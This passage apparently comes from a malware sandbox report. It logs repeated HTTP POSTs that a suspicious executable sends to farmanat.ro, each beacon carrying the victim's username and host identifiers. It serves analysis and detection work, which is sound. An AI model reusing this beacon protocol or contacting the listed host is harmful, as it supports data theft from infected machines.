                                              Date: Thu, 25 Nov 2021 09:51:56 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              447192.168.11.2050291176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:57.572349072 CET6941OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:57.606625080 CET6941OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:57.656439066 CET6942INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:56 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              448192.168.11.2050292176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:58.081695080 CET6943OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:58.115756035 CET6943OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:58.168097019 CET6943INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:57 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              449192.168.11.2050293176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:58.603737116 CET6944OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:58.637248039 CET6944OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:58.693893909 CET6944INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:57 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              45192.168.11.2049881176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:30.618581057 CET6372OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:30.652806044 CET6373OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:30.704024076 CET6373INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:29 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              450192.168.11.2050294176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:59.123734951 CET6945OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:59.157299995 CET6945OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:59.211723089 CET6946INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:58 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              451192.168.11.2050295176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:59.583120108 CET6946OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:59.616615057 CET6947OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:59.666563988 CET6947INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:58 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              452192.168.11.2050296176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:00.084925890 CET6948OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:00.119179964 CET6948OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:00.179145098 CET6948INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:59 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              453192.168.11.2050297176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:00.618988991 CET6949OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:00.652857065 CET6949OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:00.706468105 CET6950INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:59 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              454192.168.11.2050298176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:01.143884897 CET6950OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:01.177536964 CET6951OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:01.226968050 CET6951INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:00 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              455192.168.11.2050299176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:01.658061028 CET6952OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:01.692475080 CET6952OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:01.742136002 CET6952INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:00 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              456192.168.11.2050300176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:02.188968897 CET6953OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:02.223208904 CET6953OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:02.275688887 CET6954INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:01 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              457192.168.11.2050301176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:02.707520962 CET6954OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:02.741075039 CET6955OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:02.795593977 CET6955INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:01 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              458192.168.11.2050302176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:03.225980043 CET6956OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:03.260158062 CET6956OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:03.310566902 CET6956INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:02 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              459192.168.11.2050303176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:03.735457897 CET6957OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:03.768945932 CET6957OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:03.818984985 CET6958INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:02 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              46192.168.11.2049882176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:31.231230021 CET6374OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:31.265408039 CET6374OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:31.317507029 CET6374INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:30 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              460192.168.11.2050304176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:04.214606047 CET6958OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:04.249846935 CET6959OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:04.306943893 CET6959INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:03 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              461192.168.11.2050305176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:04.684537888 CET6960OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:04.718717098 CET6960OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:04.768456936 CET6960INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:03 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              462192.168.11.2050306176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:05.176481009 CET6961OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:05.210149050 CET6961OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:05.259536028 CET6962INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:04 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              463192.168.11.2050307176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:05.687913895 CET6962OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
